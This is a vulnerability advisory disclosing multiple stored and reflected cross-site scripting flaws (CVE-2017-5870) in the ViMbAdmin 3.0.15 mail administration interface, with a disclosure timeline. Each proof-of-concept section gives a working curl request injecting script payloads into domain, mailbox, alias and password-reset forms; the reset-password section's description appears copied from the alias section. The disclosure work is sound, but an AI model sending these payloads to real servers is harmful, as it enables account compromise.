ViMbAdmin 3.0.15 Cross Site Scripting

`# [CVE-2017-5870] Multiple XSS vulnerabilities in ViMbAdmin  
  
## Product Description  
  
ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at www.vimbadmin.net.  
  
## Details  
  
**CVE ID**: CVE-2017-5870  
  
**Access Vector**: remote  
  
**Security Risk**: high  
  
**Vulnerability**: CWE-79  
  
**CVSS Base Score**: 7.2  
  
**CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H  
  
  
## Proof of Concept  
  
### Domain creation form  
  
#### Exploit  
  
The domain creation form is vulnerable to a stored XSS vulnerability, through the `domain` and `transport` variables:  
  
```  
curl 'http://<ip>/domain/add' -H 'Cookie: VIMBADMIN3=<SESSIONID>;' --data 'domain=testdomain%22%3E%3Cscript%3Ealert%28%27xss domain%27%29%3C%2Fscript%3E&description=none&backupmx=0&active=0&active=1&max_aliases=0&max_mailboxes=0&transport=virtual%22%3E%3Cscript%3Ealert%28%27XSS virtual%27%29%3C%2Fscript%3E' --compressed ;  
```  
  
The payload gets injected inside the `http://<ip>/domain/list` page.  
  
#### Vulnerable code  
  
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.  
  
### Mailbox creation form  
  
#### Exploit  
  
The mailbox creation form is vulnerable to a stored XSS vulnerability, in the `name` variable:  
  
```  
curl 'http://mailadmin.commeun.ninja/mailbox/add/did/<domain id>' -H 'Cookie: VIMBADMIN3=<SESSIONID>' --data 'local_part=test&domain=<domain id>&name=test%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&password=<password>&quota=0&alt_email=&cc_welcome_email='  
```  
  
The payload gets injected inside the `http://<ip>/mailbox/list` page.  
  
#### Vulnerable code  
  
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.  
  
### Alias creation form  
  
#### Exploit  
  
The alias creation form is vulnerable to a stored XSS vulnerability, in the `goto` variable:  
  
```  
curl 'http://<ip>/alias/add/did/<domain id>' -H 'Cookie: VIMBADMIN3=<SESSIONID>' --data 'local_part=test&domain=4&goto%5B%5D=test%40test.com%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E'  
```  
  
The payload gets injected inside the `http://<ip>/alias` page.  
  
#### Vulnerable code  
  
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.  
  
### On reset password page  
  
#### Exploit  
  
A reflected XSS vulnerability has been found on the alias creation form, using variables `captchatext`.  
  
```  
curl 'http://<ip>/auth/lost-password' --data 'username=none&captchaid=<captcha id>&requestnewimage=0&captchatext=none%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&login=Reset+Password'  
  
```  
  
The payload gets injected inside the `http://<ip>/alias` page.  
  
#### Vulnerable code  
  
The vulnerable code is located in the `_getFormLostPassword()` method of the `<vimbadmin directory>/application/controllers/AuthController.php` file.  
  
## Affected version  
  
* tested on version 3.0.15  
  
## Timeline (dd/mm/yyyy)  
  
* 22/01/2017 : Initial discovery.  
* 16/02/2017 : First contact with opensolutions.io  
* 16/02/2017 : Advisory sent.  
* 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.  
* 13/03/2017 : Sysdream Labs request for an update.  
* 29/03/2017 : Second request for an update.  
* 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.  
* 03/05/2017 : Full disclosure.  
  
## Credits  
  
* Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
`